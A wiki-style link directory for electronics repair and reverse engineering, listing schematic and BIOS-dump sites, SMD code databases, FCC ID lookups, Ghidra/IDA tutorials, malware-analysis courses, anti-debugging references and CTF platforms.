::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.